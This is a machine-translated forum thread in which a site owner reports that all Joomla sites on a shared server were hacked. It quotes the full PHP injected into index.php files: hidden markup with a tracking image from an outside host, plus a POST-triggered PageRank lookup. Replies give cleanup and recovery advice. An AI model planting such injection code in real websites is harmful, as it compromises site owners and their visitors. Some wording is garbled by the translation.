可能重复:
我的服务器被黑了应急
所有的Joomla! 在我的单个服务器上托pipe的站点被黑客攻击,并将以下代码注入到许多目录的index.php文件中。
<?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; $i < $length; $i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String, 0x1505, 0x21); $Check2 = StrToNum($String, 0, 0x1003F); $Check1 >>= 2; $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF); $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 ); return ($T1 | $T2); } function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0; $HashStr = sprintf('%u', $Hashnum) ; $length = strlen($HashStr); for ($i = $length-1; $i >= 0; $i--) { $Re = $HashStr{$i}; if (1 === ($Flag % 2)) { $Re += $Re; $Re = (int)($Re / 10) + ($Re % 10); } $CheckByte += $Re; $Flag ++; } $CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 - $CheckByte; if (1 === ($Flag % 2) ) { if (1 === ($CheckByte % 2)) { $CheckByte += 9; } $CheckByte >>= 1; } } return '7'.$CheckByte.$HashStr; } function getpr($url) { $ch = CheckHash(HashURL($url)); $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "Rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } } if(isset($_POST['xxxprch'])) { echo getpr($_POST['xxxprch']); exit(); } else ob_start('outputxxx_callback'); error_reporting($olderrxxx); } //}}861921ab 据我所知,根据所有文件,我的Joomla! 网站是安全的。 但是,同一台服务器上的所有人都同时遭到黑客入侵。 主机故障?
任何人都知道我应该开始清理这个烂摊子了吗? 除了我的网站备份,还有哪些快速解决scheme?
而我最大的问题是跟踪黑客到他/她的网站,服务器或位置的最好方法是什么? 我真的想向他们表示我对他们工作的赞赏。
我的猜测是,他们得到了一个特洛伊木马的服务器的密码。 检查你的电脑,特别是如果你存储在任何程序(浏览器,FTP客户端,总指挥等)的服务器密码顺便说一句:我假设你正在使用Windows
关于追踪黑客,它不会很容易。 首先检查发生这种情况的访问日志。 您可能会在那里看到大量的ftp活动。 看看这些日志的IP。 如果他们全都不一样,那么他可能使用僵尸电脑,而且你不太可能find他。 如果他们都一样,那么你可能会更幸运一点。
无论如何,这听起来像是一个自动攻击。 做一个search来检查其他网站(不在你的服务器上)是否注入了相同的代码。
“据我所知,根据所有文件,我的Joomla!网站是安全的。”
那个陈述是你的第一个问题。 如果你的谷歌“joomla黑客”有280,000结果仅在过去一个月…
就恢复而言,我不会相信从已知的好备份中恢复的任何东西。 这些编辑只是你find的那些。 谁知道还有什么可能放在那里。
为了追踪他们,您可能需要阅读以下内容: http : //kb.siteground.com/article/Joomla_hacked.html
简而言之,我会说你的机会几乎是零。 但是,如果你们有钱的话还是有政府的支持,他们就会上涨几个百分点。
你没有给我们足够的细节来帮助解决这个问题,几乎可以肯定是一个自动化的攻击,而试图追踪它只会浪费你的时间。
没有快速的方法可以从中恢复。 从轨道上撤出并从已知的良好备份恢复是唯一的方法。
确保你保持Joomla最新! 保持最新的安全更新,并将其安装在所有发布的网站上。